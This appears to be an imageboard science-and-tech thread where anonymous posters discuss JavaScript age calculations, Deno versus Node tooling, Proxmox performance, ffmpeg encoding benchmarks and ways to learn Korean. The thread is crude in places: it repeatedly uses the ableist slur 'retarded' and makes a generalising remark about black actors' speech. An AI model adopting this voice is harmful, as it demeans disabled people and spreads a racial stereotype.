Build fail edition
coding is difficult for me too because just pressing space bar wrong or enter wrong it's always build fail so i can't nothing comes up so i don't know what i did wrong
#3 SciTech Thread
혼자 하지마!
>coding is difficult
not only...
>reduce motion
>disable animation effects
>had to basically hold 1 long cable and 2 boxes in the hand, attaching it to my ear, while still walking
that's what I'm talking about
how do them magnetic power bricks work
you mean the magsafe battery pack?
I thought about buying one, but it's too small, charging is slow and uses lightning port
I think the big phone (with big battery) is the only solution
lillebror v smart
i guess it was all ipos and velocity back then and thats why theres some misses in javascript but makes sense in the context
>get age of the person
>first version of my code
const years = Math.floor((now.getTime() - born.getTime()) / MILLISECONDS_IN_YEAR);
>second version of my code
const years = now.getFullYear() - born.getFullYear();
gosh, I'm so dumb, I didn't even know there's a mistake
>new Date().getTime() returns unix timestamp for your local time
this is retarded
const now = new Date(); const offset = now.getTimezoneOffset() + 9 * 60; // change local TZ to KST now.setTime(now.getTime() + offset * 60 * 1000);
tz = timezone(timedelta(hours=9)) now =
much simpler in python
>Epoch Shifting is sometimes used internally in date libraries as a shortcut to avoid writing calendar arithmetic. When doing so, any access to non-UTC properties must be avoided. For example, once shifted, a call to getUTCHours would be acceptable, but a call to getHours would be invalid because it uses the local time zone.
this is a bit retarded
so intead of using getTimezoneOffset when changing timezone, we can use
functions to pretend the originalgetTime
was UTC. uh huh
>okay, now calculate the korean age
on one hand it's even more gooky, on the other they deprecated it themselves, so probably no so relevant anymore
but that legacy stupid age will definitely pop up here and there periodically, will people wondering all the time whether it's the true age or stupid age
>Korean age = (current year - year of birth) + 1
stop, it's actually even better, no branches
korean age master race, compare it to
let years = now.getFullYear() - born.getFullYear(); if ( now.getMonth() < born.getMonth() || (now.getMonth() === born.getMonth() && now.getDate() < born.getDate()) ) { // birthday has not yet happened this year years -= 1; }
no way, 3 fucking branches!!!
did the superoptimized branchless age calculation
function calcAge(now, born) { const fix = Math.sign( (born.getMonth() - now.getMonth()) * 64 + (born.getDate() - now.getDate()) * 2 - 1 ); // -1 or 1 const fixHalf = (fix + 1) >> 1; // 0 or 1 const age = now.getFullYear() - born.getFullYear() - fixHalf; return age; } console.log(calcAge(new Date("2024-01-01"), new Date("2021-01-02"))); console.log(calcAge(new Date("2024-01-02"), new Date("2021-01-02"))); console.log(calcAge(new Date("2024-01-03"), new Date("2021-01-02"))); console.log(calcAge(new Date("2024-01-04"), new Date("2021-01-02")));
even better
function calcAge(now, born) { const fix = !!( ((now.getMonth() - born.getMonth()) * 64 + (now.getDate() - born.getDate()) * 2 + 1) & 0x80000000 ); return now.getFullYear() - born.getFullYear() - fix; }
might contain branches, the last one:function calcAge(now, born) { const noBdayYet = (((now.getMonth() - born.getMonth()) * 64 + (now.getDate() - born.getDate()) * 2 + 1) & 0x80000000) >>> 31; return now.getFullYear() - born.getFullYear() - noBdayYet; }
probably ok now
minipcs all the way
how do you game?
old games no spidymane
the absolute state
yeah, those prices are retarded. and soldered SSD
I bought 32GB just in case, although I suppose I would have been better with 16GB 1TB instead
I bought 32GB RAM for my old PC 10+ years ago, which is my NAS now, and newer needed that much
imagine 32GB RAM on a storage server, even ZFS doesn't need it
found regression in my JS app
UI is way too complicated, something can always break in random place even if you're trying to be very accurate
is lower priority than+
imagine that???
>clone project that was working just days ago
npx ts-node-esm ./test_thing.ts
>TypeError [ERR_UNKNOWN_FILE_EXTENSION]: Unknown file extension ".ts"
just about mchecking had it
I tried ts-node and didn't like it, too many bugs with ESM
use swc-node, it's better and faster
many lines of warnings on lts node
deno supposedly has some primitive support for puppeter now gonna try that first before trying to figure out swc. please save me from your creation mr dahl
deno works and 95% of configuration deleted, rolling with /defaults/ instead
thank you dahl and thank you jejuj
>lts node
use the latest and greatest
I don't think that stuff is amusing. it's like zig or nim
surely you can do something with it, but the benefits from the more popular solution are too good to ignore
so you're using it with TS to scrape your kpop stuff?
I'm using scrapy on python instead
thought about using puppeter but programming on python doesn't make me mad usually
but TypeScript is actually much better than mypy
that guy who created Turbo Pascal, .NET and TypeScript is genius
also python is so slow, even slower than V8
>install prettier
>install eslint
>setup tsconfig
>configure esm
>install third party ts script runner
yeah i'm thinking nah, if a better tool works (which it does since since npm support seems to work now) i might as well go with better #defaults
node can always stay as the backup option
just some stuff that needs login
>install prettier
>install eslint
same on deno?
>setup tsconfig
all framework bootstraps have one
>configure esm
you made it harder for yourself by using experimental technology on stable node
>if a better tool works (which it does since since npm support seems to work now)
it might somehow work, but not as good as the native npm support
if you look in the code, there must be millions of hacks inside deno, and they will break sooner or later
>same on deno?
>all framework bootstraps have one
deno frameworks wouldnt have one
>you made it harder for yourself by using experimental technology on stable node
i tried with commonjs or whatever is the default, now that was difficult. anyway its all magic words that need to combine package.json's type, tsconfig and the specific way you import/require so dumb
luckily deno fixes it all no config needed
>they will break sooner or later
node projects already break for me from time to time so that wouldn't be a pro or con either way but i trust dahl knows what works and what doesn't with his bayby
how is it better? he just put tons of dependencies inside his package
>wouldnt have one
what if you want custom TS settings?
>node projects already break for me from time to time
that's a different type of breakage
but use whatever works for you. for me deno looks nice as an idea, but too 3rd-party to use in my production
codeI mean it's like using coffeescript or moonscript which are merely just tiny wrappers on top of the real thing
I mean look at the real source of entropy. it's always the OS, C libraries, programming language library
tiny stuff on top such as npm 10-line wrappers for the C CLI utility are irrelevant garbage, they don't bring any value
so in this paradigm deno doesn't bring as much as node and typescript because it's tiny wrapper on top
>how is it better?
i dunno go and rust ship with formatters and linters and i liek it, wcyd
>too 3rd-party
>tiny wrappers on top of the real thing
node and deno are built on v8, by the same guy except this time he got to do a rewrite with better #defaults
>go and rust ship with formatters and linters
I thought you meant deno includes prettier/eslint as dependencies. but it seems like they implemented it in rust. yeah, I like that
tbh I use prettier inside VSCode and no linter, don't know why people like to make life harder for themselves with extra deps in
unless it's a big project with many people...>are built on v8
although I've checked, they actually partially reimplemented node stdlib in deno
so now you have an idea about "will break sooner or later" I've talked above
and that reimplementation of node_modules and npm must be pretty fragile, with many things not working here and there
so now I don't like it even more
I thought they just packaged node and npm and eslint and what's not as a part of the distribution. but they are mad enough to reimplement it from scratch (with a consequence of most things not working at all of course)
lol they repeated the Golang mistake
at first there was no module management at all, Ryan was like "just use HTTP URLs" bruh
now, same as golang, they said "ok, maybe it was a bad idea"
so predictable when you try to reinvent the already working stuff
>Golang mistake
now they've added generics
gosh, I can't believe even Rob Pike suffers from Dunning-Kruger...
>This uses the swc parser for TypeScript written in Rust (it's super fast).
oh it's all in Rust 진짜로
so use swc to run node app, it's in Rust
just treat it like a black box theres people paid to keep it working
and if you for some reason need to write some huge web service thing on a framework with tons of deps just check if deno is supported by the framework if not use node
import maps are pretty new yeah but makes sense to go with it instead of some deno specific thing
>just treat it like a black box theres people paid to keep it working
unfortunately I know how often those reimplementation things break, don't even want to try
I even regret a bit I picked SolidJS instead of ReactJS because all the world is writing stuff for React
and the AI stuff at v0.devnow imagine I picked Deno instead of Node
>some deno specific thing
they are deno specific way to deal with dependencies
the code seems similar a bit, but I dunno where deno guys grabbed it from, very old version of node? or just heavily rewritten?
now imagine npm module uses some new method of the node's std library, good luck debugging this stuff
>huge web service thing on a framework with tons of deps
tbh I try to use as little npm deps as I can (even tho it's very hard because of evil people like sindresorhus)
so deno approach could be nice in theory
but at the same time I want my stuff to work with as little effort as possible, and with max possible support from upstream as possible, so I mostly use the most popular stuff
so you can see it doesn't work very well with deno
>picked SolidJS instead of ReactJS
rewrite all view state code and jsx templates
>imagine I picked Deno instead of Node
install tsconfig.json and use the node binary instead
>rewrite all the code
I'm not that mad
>Nov 14, 2021
so they basically grabbed upstream source 2.5 years ago and never updated it since
imagine hilarious bugs it may cause
oh you meant it's easy to switch back to node
maybe, just don't want to spend time on tinkering with deno
i'll convert all my projects to deno so i dont need to deal with node ts module breakage
i think you may be writing some server side js to have to deal with node std so much, luckily i just have client side stuff like browser extension
>i think you may be writing some server side js to have to deal with node std so much
actually no, it's SPA
but stdlib is still important because you need a lot of boilerplate for building/testing that stuff
>4 days ago esbuild deno plugin got npm specifier support
you can guess how bleeding that stuff is
>client side stuff like browser extension
that might work if you pick deno-specific web framework and deno-specific builder
but then
>install tsconfig.json and use the node binary instead
won't be true anymore
>deno run --allow-read --allow-write --allow-env npm:create-vite-extra@latest
not sure how well it works
maybe it's better than I think
I found a logical error
popular runtime + popular framework = works (both make effort to make it work good)
popular runtime + unpopular framework = works (unpopular framework tries hard to be compatible)
unpopular runtime + popular framework = works (unpopular runtime tries hard to be compatible)
unpopular runtime + unpopular framework =
oh no...
>maybe it's better than I think
although yarn looked very cool in docs too
but when I actually tried it I hated it so much I uninstalled it in like 10 minutes when realized how bad it actually is. never again touching it
>that might work if you pick deno-specific web framework and deno-specific builder
didnt think this was possible but esbuild uses fancy css imports from javascript and deno typechecker doesnt like that
js world is a babel's tower sad
i guess scripts is denos only domain for now
>css imports from javascript and deno typechecker doesnt like that
it doesn't use typescript?
typescript is fine with those because you can define type for
import via.d.ts
>If you want to utilise JavaScript that has type definitions (e.g. a .d.ts file), you have to explicitly tell Deno about this. The details of how this is accomplished are covered in the Types and type declarations section.
seems possible, just disabled by default
>didnt think this was possible but esbuild uses fancy css imports
I used that feature in webpack 8 years ago
the results are out
proxmox is super fancy and nice to use to make various vms all from a web browser but unfortunately performance is not very healthy.
while hyperv gets you above 95% of host machines cpu performance in a vm when you assign all the cpu cores, in proxmox it's sub 50%.
i wondered why vm installations were so dog slow to do until i got in the vm and tested them out
stupid sexy windows
>while hyperv gets you above 95% of host machines cpu performance in a vm when you assign all the cpu cores, in proxmox it's sub 50%.
you did something wrong, KVM can't have 2x less performance than HyperV, it's all HVM
and IO drivers should also have similar performance too
definitely, theres a gigaton of settings but but as the representative how wud i know. i just went with defaults other than virtio from here
oh, I got it, you need SMP inside your VM. I was talking about single-core VM performance with HVM
seems to be CPU pinning
you need to pin VM cores to your physical CPU cores
>I replicated the same setup I had on unraid as close as I could, but even after a lot of changes and iterations with my prox settings, unraid is blowing it out of the water (at least GUI based VMs? ) using RDP
told you to use unraid
>told you to use unraid
nooooo i got scammed by the hn comments
just run this and all your problems will be magically solved
they're just built for a bit different purposes: one (Proxmox) for VPS providers who run dozens of VMs on a giga servers, another (Unraid) for geeks who run games on their Linux NAS machine and need to map all available resources 1:1
but tbh I didn't think Proxmox is that bad in 2024 for such a simple task
that's why I think those HN guys who say "just install debian and samba hurr durr" are full of shit
stop, I said that myself few weeks agothey never actually compare performance of their solution compared to state of the art
but it's not always the case, sometimes it's actually easier to modify all the configs by hand, if you know what you're doing, instead of hooking into the complicated production stuff
but need to research for that a lot too
UI is so complicated, after weeks I can't even remember why I did some rendering optimizations and I'm too afraid to touch them now because it may break something
are heat packs used outside korea never seen em
found how to perfectly fix the issue
tbh, it even worked better before, but then I tried to optimize stuff and it actually became worse
very comfy to develop on 3 displays
display 1: browser
display 2: editor
display 3: terminal
what to use if not huginn and n8n
they are both very bad
what it do
like visual programing? ive only heard node red but idk if good alternative
yeah, basically I need to code very small chunk of data transformation and all the boilerplate stuff (scheduling, message sending, formatting, etc) is done through GUI
first I had huginn configuration but it sucks
then I migrated to n8n but it has its own issues too
not sure if I want to try node-red, it might be bad too
if only I knew how shitty those solutions are, I would have written just simple scripts instead
interesting to think how the job que loop would look with graphical programming thing
does that work well? and then the problem is the code blocks are annoying to keep in sync with your code if you actually code in a real editor if this might be nice thing to put some graphs on
what are you even trying to do
just use gnuplot
syncthing is kinda scary auto updating its own full permissions binary every couple of days maybe theres a simpler way since i already have always on server
perhaps some scheduled rclone run
what do you think duckie
>does that work well?
mostly yes, but both huginn and n8n have issues like random freeze and things like that
>code blocks are annoying to keep in sync with your code if you actually code in a real editor
yeah, but you rarely need to write and edit a lot of code there, so not a big problem
stop calling me duckie or else
started listening to fridman-nim's podcast too when not on the compoter
i used to search for programming stuff but its not like you ever learn anything from those so better go for entertainment
I've already watched too many of them
the most interesting are with people like Carmack, Bostrom, but he also invites many boring guests
duckie said its great
two fewer auto updating mystery binaries
what are you even syncing
looks like they noticed right side was underused
rcmd bros...
>Nearly 30 years ago, we introduced the Windows key to the PC keyboard that enabled people all over the world to interact with Windows
>The Copilot key joins the Windows key as a core part of the PC keyboard and when pressed, the new key will invoke the Copilot in Windows experience
why do they think a key which brings the system dialog is somehow revolutionary
it's almost apple's "amazing" cringe innovations
imagine amount of money keyboard companies will make on selling the "updated" windows 12 compatible keyboards tho
that shitty store cancelled my kindle order
the universe doesn't want me reading
i use rsync in a crontab
noobs have no idea you can press windows plus another key
I use iCloud sync
be able to focus on one thing for a long time might be considered as a talent per se. it's a matter of definition
all people have different starting skills, then they can choose the amount of effort to put into further development of the skill and achieving something with that skill. how well can you do that depends on many factors: you may have low starting skill, but strong determination, so with time you can progress a lot. or you may have high starting skill, but lose motivation too quickly in case of failure. also support from the people around you is very important: if you receive portion of dopamine for every little step, that will help you to climb much higher. but building that social circle isn't simple either
in other words, "just do it" is naive approach. you have to be smart and work on many non-trivial issues at the same time
one less mystery browser extensions with access to all data
just watch fullscreen
just need auto hd since i'm in the default 720p shadow pool
>default 720p shadow pool
just buy premium
what device or app would you switch language to korean to something that doesnt have that much unexpected messages that it would get annoying too fast
if you can learn english from vidya surely korean also>the more effort a technique requires, the more likely you’ll be to engage in self-defeating avoidance instead
the dream of fancy notes is over, pen and paper won
dunno, just OS and all apps (system language)? shouldn't be too hard to learn menu items (not sure if that would help with learning much tho)
>if you can learn english from vidya surely korean also
that's a bit different. you have to play with koreans and talk in korean to learn that
and european languages are easier to learn that korean
>But you know what’s an even worse way of internalising a book? Not reading it to begin with
don't agree. if you just read, chances are, you will forget 90% of the information very quickly, so it's barely better than not reading at all
>pen and paper won
good luck finding those notes 5 months later
better to research one good (but simple) digital solution
nowadays most people use Obsidian
but I don't like it
>Apparently, we creative-worker types crave nothing more than the perfect technique for reading more books, then capturing their contents with a tricked-out digital notetaking system
especially if you read books like that >>1010443 ➡
>one person creates X
>1000 people make videos, write posts about how cool that X
>1000 more people write how X sucks
>1000 people after some time make videos like "why I stopped doing X"
>then videos like "why X is still relevant"
>then videos like "why should we care about X"
>then "X is a snake oil and irrelevant"
just endless stream of people discussing every possible way of looking at X
I'm surprised we can still evolve at this point. probably smart people who actually create X, don't spend their precious time watching dumb videos on youtube
>It means you’ll avoid that important book altogether, in favour of something that matters to you less. It means listening to a podcast you don’t especially want to hear, because you’re too tired to take notes on the one you did want to hear, but now probably never will.
yeah, of course, genius
because learning is hard, you have to make new connections in the brain
there's no trivial shortcut and if you don't take notes you just don't learn it
looks cool you could probably make this to show visible feedback from cpu usage, fan speed or build fail
i dont have a compatible hardware to test tho
what do you think about this guy
>Once you learn the basic vocabulary, nothing stops you from learning just from immersion. Don't wait for too long. There are people who trap themselves into thinking, "I'm going to start watching raw anime when I'm good", "I don't immerse because I don't understand Japanese yet". This is a very dangerous pattern. You start wearing skates before you know how to skate. You start watching without subs before you understand.
>Your teacher doesn't know Japanese that well.
>If you happen to get a native as your teacher, they likely have no idea how language acquisition works, they don't remember how they learned Japanese, and they've never actually followed their own advice.
need to try to adapt weaboo's learning guides for korean, they have probably discovered few neat tricks
although I don't want to learn korean that much anymore
>Avoid blue-pilled resources. There are a myriad of methods out there, and each of them tells you to do different things. Some methods are effective, but many are not. Unfortunately, the quality of advice on the Internet is often poor, with more bad advice than good advice. If you want to reach mastery in a foreign language, you don't want to waste you time on ineffective methods.
how can I know what's good and what's bad
i have discovered i have dogshit memory so i am doing extremely bad on learning korean
what im thinking about recently is replicating what that howtostudykorean fellow did try to "teach" it instead (write down 2 pages on each line ending or whatever lesson)
the scholars always say you should teach to learn but obviously this would just be reading and writing by myself
I was making notes based on learning material (i.e. re-write it with my own words for better understanding)
not sure if that counts as teaching
but I'm forgetting that too but at least I can quickly find out how to use some specific grammar, and I know it's 100% correct information because I've already researched that in the past. so it's like external brain: I know everything but only when I have access to my notes
I'm wondering how people learn languages at all. are language schools just a massive scam and most students don't know shit after they finish them? what's the most effective way of learning and why people don't use it?
or maybe the particular method isn't that important, you just have to be persistent and you will learn new language in 10 years or so whatever you do. it's hard to believe people are actually "fluent" in just 2 years
or maybe if you're extremely motivated for 2 years 18 hours per day and don't burn out
I don't know how to avoid the pattern on the top (periodic dramatic burn out)
the pattern on the bottom seems to be pretty slow, like "10 years" I've mentioned above
that guy was reviewing Anki cards for 1 hour every single day for 5 years and can just read simple manga without looking words up
I burnt out after doing 10% of that
funny guy
correct, input is the most important thing. rewatch a korean movie without subtitles.
or watch 500 episodes of your favorite waifus yapping without youtube subtitles.
>If you happen to get a native as your teacher, they likely have no idea how language acquisition works.
natives speakers only have the ability to produce and interpret their language, and don't know the inner works of it. it's like someone who has become amazing at driving but know nothing about how cars work on the inside, and instead of teaching you how to drive they try to teach you how a car works.
>try to "teach" it instead
sounds like the feynman technique
>are language schools just a massive scam
pretty much, at least if they don't primarily focus on input. the problem is the amount of time you spend in classes is nowhere near enough, so you have no choice but to spend free time learning the language and using the classes as extra help if you want the classes to mean anything at all. if you do this, then classes can actually be very nice if it's the only time you get to practice having conversations and other things you don't get at home.
>or watch 500 episodes of your favorite waifus yapping without youtube subtitles
but what's the point if I understand only 5% of the sentences?
I know that I already know and I can only learn more by looking up the words. if I just listen, there's no way I can learn more
>natives speakers only have the ability to produce and interpret their language, and don't know the inner works of it
>sounds like the feynman technique
oh yeah, I like that
>if it's the only time you get to practice having conversations
I believe talking in korean with korean friends on kakao talk should be beneficial
but I can barely make friends even using my native language so
>but what's the point if I understand only 5% of the sentences? I know that I already know and I can only learn more by looking up the words.
what's important to know here is that we are talking about multiple things that are unrelated here.
- looking up words is good for knowing more words.
- input is good for making your mind more used to the phonology of the language, the sounds and everything about how sounds are used in a language. this will not help you learn new words.
since they are different things, you need both.
as for the importance of listening to something you barely understand: it's exhausting and it feels counterintuitive, but if it feels like an exercise you're doing it right. your mind gets better at identifying sounds and figuring out which sounds matter and which don't, where and when. this process is crucial to be good at listening. our minds are built to acquire the phonological system of a language this way. just listen and listen, and your brain figures out the patterns. unfortunately it just takes a while.
this is true for kids too who learn their first language. they already start slowly discovering the phonological system of the language while they don't actually understand much.
>but I can barely make friends even using my native language
which is why i think classes can be useful. for many it's one of the few opportunities to actually try conversing in the language. i agree getting friends on kakaotalk is great as well.
>it's exhausting and it feels counterintuitive, but if it feels like an exercise you're doing it right
what's the difference compared to listening unknown language as a "white noise"?
I mean if you understand e.g. 0.5 words per sentence, how do you know that everything else your missed will help you? or it's important skill to parse those 0.5 words (trying to squeeze at least the minimal drop of meaning out of the rubbish)?
>rewatch a korean movie without subtitles.
or KAV for the motivation
and dialogues are quite simple there toothat guy even links to hentai manga
having some understanding of meaning is important but people overestimate how much you need.
listening to an unknown language as white noise is not helpful since you need to connect language with the real world in some way. just like how a baby who starts off understanding nothing becomes fluent because their interaction with the real world alongside the language bridges that necessary gap for them, with no need of a dictionary. if you're like me who doesn't live in korea, you need to watch or listen to something where you know what's going on or you need to have conversations with people.
>I mean if you understand e.g. 0.5 words per sentence, how do you know that everything else your missed will help you?
you primarily need either what you do understand or the real world context. your mind will find it important to be good at figuring out the phonology of the language since it doesn't like not understaning. in the process you might figure out some more vocab from context (just like kids) but the most important part is you get much better at identifying words and grammar that you already know. this is the primary point of learning through input. getting most of your vocab from listening is gonna be tough unless you live in the country and it's the only language people speak to you, and they speak a lot to you.
i started using the internet exclusively in english when i understood about a third of each sentence
looking up every single word i didn't understand, which is something i still do
i was quite young then but i remember feeling like i improved a lot every single day
probably should start reading more korean forums and chats
but I've already tried talking in korean discord servers few times and it wasn't very interesting
>your mind will find it important to be good at figuring out the phonology of the language since it doesn't like not understaning
interesting idea
>identifying words and grammar that you already know
that means you still need to find and learn new words?
I think I'm getting a bit better at recognizing words I know after listening to vlogs without subtitles. but the process seems too slow
if you think about it, isn't it stupid to solve 2nd level procrastination
life → escapism to kpop → procrastination while learning korean
probably should focus on something useful to begin with
like life? where are you gonna start?
don't want to think about that
why fix your life when you can fix your korean grammar?
if i wanted to attempt to fix my life it would have to start with kpop the only hobby in the world you cannot talk to people about
how is that useful?
should start with a hobby where you can socialize a lot
yes literally anything else is better
femme fatale korean waifus push us into the abyss of loneliness
You can eliminate fun forms of procrastination but you can't eliminate it altogether, it's procrastination all the way down. By breathing and eating and so on, I am putting off the inevitable.
I used to procrastinate to avoid thinking about work. Now I work to avoid other things. It's all avoidance, escapism, procrastination.
first you find a hobby, then you use it as an excuse to procrastinate, then you turn it into a job, then you procrastinate instead of doing ex-hobby. the circle of life
well, some people still can learn something for 5 years every day, without procrastination
i tried doing anki for like 4 months straight but it doesnt stick mein memory doesnt work
>first you find a hobby, then you use it as an excuse to procrastinate, then you turn it into a job
basically what i've been trying to do. korean as a hobby for years and now studying linguistics.
so right now i have an excuse to learn more korean
it helped me a lot but I just can't do same thing every single day so I dropped
I'm even depressed with eating and sleeping chores, the periodic nature of the process kills me. I want to be impulsive
the only thing I can do every day just fine is talking to people
are you in the uni? what kind of job would you have?
never used anki but i did use memrise during the first two years or so of learning korean.
other than that and howtostudykorean i've only read/listened to content, chatted with others, looked up words on naver and googled random stuff.
I've bought Anki for ios for $25 but barely used it
yes i'm in uni. i'd love to be a researcher, but i'll be fine with plenty of other options. never programmed before uni and i've been considering computational linguistics so i'd love to start some serious programming grind but programming is such a wild new world for me that it feels overwhelming to start.
>computational linguistics
oh, sounds very nice, in particular this recent article I've mentioned recently
and the rise of LLMs and research of consciousness also brings a lot of questions to the table about how languages and corresponding brain structures work. it's all deeply connected to who we are
unfortunately I'm too dumb to do the actual research, can just read what others people do and wait for new discoveries in that area
i'll consider doing a deep dive into that article. could be a fun exercise with much for me to learn.
the sync is annoying
gotta remember to press the sync every time or when you get to your other device youre gonna redo stuff
sync sync sync
press the sync, it's manual
and the latest hottest new thing is: htmx!
lets see what one can do with it
>latest hottest
angular was 13 years ago chingu...
how to stop watching those stupid shills
LG UP550 costs $100 less than UP850
the only major difference seems to be sRGB vs DCI-P3 color gamut
not sure if that's worth $100
why doesn't mpv have a command palette
if I watch korean video with english subtitles, I can parse many words and get the meaning
if I watch korean video without subtitles, I can understand few words and get very little meaning
is it really better to learn that way
as said earlier, it's the only good way to get your brain to get used to korean phonology. i would recommend both ways of watching videos to get the best of both worlds.
i only ever watched korean content with subtitles for way too long and it was my biggest mistake by far as i improved at an awfully slow rate at korean listening. sentences that i could read with no problem in korean were embarrassingly difficult to understand through listening.
that means you still need to learn many new words at the same?
I mean if you're just listening and barely reading, there's no way you will have knowledge of words in the videos
the purpose of listening practice is not to learn new words, but to be better at picking up words you know. you need a way to learn new words as well as a way to pick them up faster. learning new words by only listening and nothing else is not effective.
Carmack was eating pizza every day for years and somehow didn't die
theres probably still a lot of english words i know what they kinda mean by having heard of them within context but wouldnt know what they actually mean or translate to my language
this would be a lot easier though if i was at least a bit better at korean so fewer words would be left for guessing
>if i was at least a bit better at korean so fewer words would be left for guessing
oh yeah, it seems to be logarithmic scale: the more words you know, the easier to lookup the few remaining words, compared to when you know just 1 word in a sentence
so I'm not entirely sure about the efficiency of "listen to content without subtitles from day 1"
except the phonology thing the smartchingu was talking above
yes this is expected. you don't even need to know the meaning to be good at identifying it when listening.
>the more words you know, the easier to lookup the few remaining words
this is of course true. the question is if you can recognize the words through listening or not. you could know every word in a sentence but fail to pick some of them up when listening, if your listening skills are lacking while you read just fine. this is what i experienced for a long time since i focused to little on improving my listening.
it's only efficient on day 1 if you're watching like peppa pig in korean or something.
listening without subtitles is just a good method to fix the problem mentioned above.
oh yeah, I'm much better at reading than listening, I would say 10x better
although that might be because I can read very slow, but when listening you need real-time understanding
listening is just by default much harder than reading. when reading, you don't have to deal with annoying stuff like assimilation or any contextual phonological processes (like 넌 pronounced 던). figuring out when a word starts or ends is hard when listening too. knowing if someone said ㅓor ㅗ, ㅆ or ㅅ etc. can be very hard, but in writing it's always clear.
I first understood the ㅇ sound when isa made this video
what about songs? it's very hard to recognize words in typical kpop song, but it has one major advantage: you can listen for kpop for hours without forcing yourself
I usually try for 10-15 minutes without much luck, then just give up and listen as a white noise
can't post on 4chan because it's blocked in the country and 4chan blocks vpns
that's a good thing
wtf, CRF=25 with x264 on 4K looks nice, but same CRF looks like shit on same video scaled to 720p
so need to set much lower CRF for smaller resolutions, like 20
or maybe just encode to HEVC, won't work with Firefox, but who cares about Firefox nowadays
>Well in reality and not some theory, what butterw says is valid. For HD source, you get away with higher CRF 19-20. For SD resolution , while watching on big TV screens, content gets upscaled, every artifact is blown up, so that 19-20 equivalent for HD might show up as a worse,CRF is better to be lower, say CRF, 16-17 or 18.
oh yeah, I was right
i can't speak for everyone, but for me songs aren't effective enough. i know there are many that care a lot about lyrics, while i am much more interested in the melody and such things. i often don't even realize there are lyrics, i just hear voices. if you are really into lyrics then maybe it's okay. i'd still argue content where people talk normally is more effective since you need to pick up on things like korean intonation and how conversations flow.
>if you are really into lyrics
there isn't much to hear in typical kpop song, it's just the content in korean I listen to the most
>i'd still argue content where people talk normally is more effective
definitely. but listening to korean podcast when you're outside and understanding 1% of the information would feel like a torture
podcasts are too tough if you understand little. still great if you're okay with being a masochist. i recommend movies and series since you see what's happening which makes it much easier to follow what's being said. though if you're comfortable podcasts are amazing.
>still great if you're okay with being a masochist
>i recommend movies and series since you see what's happening
not if you're outside (walking)
is wony a masochist?
>not if you're outside (walking)
again, if you're okay with being a masochist
>movies and series
I've seen recommendation to watch at least 2 times: 1st in your native language to understand the plot, 2nd to learn the language
not sure if I would want to watch something 2nd time
but watching interesting series without understanding (in korean) would be bad too
well, have to watch
KAVin korean anyway because there're no subs at allat least not until AI can translate it well enough
>is wony a masochist?
>watch at least 2 times
yeah, i prefer rewatching movies i like without subs. don't want to ruin my first time watching a good movie.
>movies i like without subs
i can't even watch english stuff without subtitles one of many tho so not wholly embarrassing just a lil bit
of course
interesting. i never watch english stuff with subs
I can watch youtube videos without subs, but for movies it's complicated because the way they're talking (especially black actors) is horrible
youtube is fine for sure but series and movies have such a big range of volume between scenes that it's either blast it (dont want to do that in an apartment building) or subtitles
>black actors
luckily there aren't any varieties of english i struggle with understanding. maybe if it's some jamaican guy who uses a tad bit too much patois or something
>but series and movies have such a big range of volume between scenes
yeah, right. it's a problem even with native language
but watching everything with subs is tiresome, so I try to disable them if I can
what korean movies do you like the most?
>House of the Dragon—last summer’s Game of Thrones prequel—is what broke me. How was anyone supposed to follow that show without subtitles? House Targaryen. House Velaryon. Rhaenys. Rhaena. Rhaenyra. The Sea Snake. The Crabfeeder. Now three years have passed. Now 10 years have passed. Now a different actor is playing Rhaenyra, but the same actor is playing Rhaenys. Dragons shrieking and throwing flames over all of it. What the hell is going on here?
thrillers usually and action. the typical park chan wook type movies, actions with ma dong seok etc. i can enjoy horrors too, like a tale of two sisters. same goes for dramas. loved signal and stranger.
it's so faster to type "X 어때" in korean than "what about X" in english
try how's X
nicely compressed
nice guide for x265 settings
but hevc_videotoolbox should be much faster
too bad no proper hwenc/hwdec for av1 yet
I was using the horrible ffmpeg's native encoder the whole time, instead of aac_at, just had to change
optionimagine be me
hevc_videotoolbox + aac_at VS svt-av1 + libopus
>That is really massive loss of detail. I encode my anime library with svt1-av1 1.7 preset 4 CRF 24 filmgrain-4 and denoise-1. I tested a lot and find compromise in this settings. It looks much better than x265 slow 22 I was using before while file 50% smaller at the same encoding speed. I never noticed something on this scale even tho I watch it all on 50' 4k TV.
>Incompatible pixel format 'yuv420p10le' for codec 'hevc_videotoolbox', auto-selecting format 'p010le'
time ffmpeg -v verbose -hide_banner -i crazy.mp4 -t 60 \ -pix_fmt:v p010le -tag:v hvc1 -c:v hevc_videotoolbox -q:v 65 \ -c:a aac_at -q:a 2 \ -movflags +faststart -y out.mp4
perfect encoding
now need know how that compares to x264 superslow, x265 slow, libaom and svt-av1
>x265 [info]: build info [32 bit][noasm]
>x265 [info]: using cpu capabilities: none!
>brew bottle
>encoded 120 frames in 14.36s (8.36 fps)
>my build
>encoded 120 frames in 4.16s (28.83 fps)
imagine be such pabos
finally fast wifi
now just need to wait 3 years until adoption in notebooks and phones
if you get that anyone will be able to look at you through the walls
how? by observing the waves pattern?
6g too>A very exciting innovation that 6G will bring to the table would be its ability to sense the environment. The ubiquitous network becomes a source of situational awareness, collating signals that are bouncing off objects and determining type and shape, relative location, velocity and perhaps even material properties
it will all be over soon
oh no, that app wrapper doesn't work with URL drag-and-drop
but the default app does
>looking at kpop waifu through the walls
>perhaps even material properties
>touching kpop waifus with microwaves and studying their material properties
pressing fn+f12 on that logitech keyboard is a pain
probably should have gone with better layout
chromeos 120 is out and the results are in
- mouse wheel scrolling officially works now holy
- linux apps still look blurry and unusable on high dpi
- shortcuts are still dog dumb. imagine making a new os and not using super for controlling os and windows on top of being dumb some important shortcuts also get eaten by linux apps cause you know it's just ctrl or alt plus something
>not using super
use copilot key
>youtube-dl with path youtube-dl not found in PATH or not enough permissions
it's just path issue, now works fine
retarded build system
>x265 slow 8bit
>encoded 120 frames in 9.89s (12.13 fps)
>x265 slow 10bit
>encoded 120 frames in 13.13s (9.14 fps)
>x265 medium 10bit
>encoded 120 frames in 4.94s (24.27 fps)
slow is way too slow, but need to compare quality of medium to hevc_videotoolbox
x265 vmaf: 99
videotoolbox vmaf: 27
thinkpads have fn-lock for that, i just leave that on
there's also fn+esc here to lock fn keys, but I don't like using fn to control volume
vtb → 265 → libvmaf = broken timestamps
vtb → 265 → y4m → libvmaf = broken timestamps
vtb → mkv → libvmaf = broken timestamps
vtb → mkv → y4m → libvmaf = ok
vtb → mp4 → libvmaf = ok
videotoolbox seems comparable to x265 medium so far, but 10x faster
finally a task for my new HDD: store gigantic y4m sources for benchmarks
>aria2c -j 16 -x 16 -s 1 -i sources.txt
cheap kpop fanmeets soon
sar: doesn't work
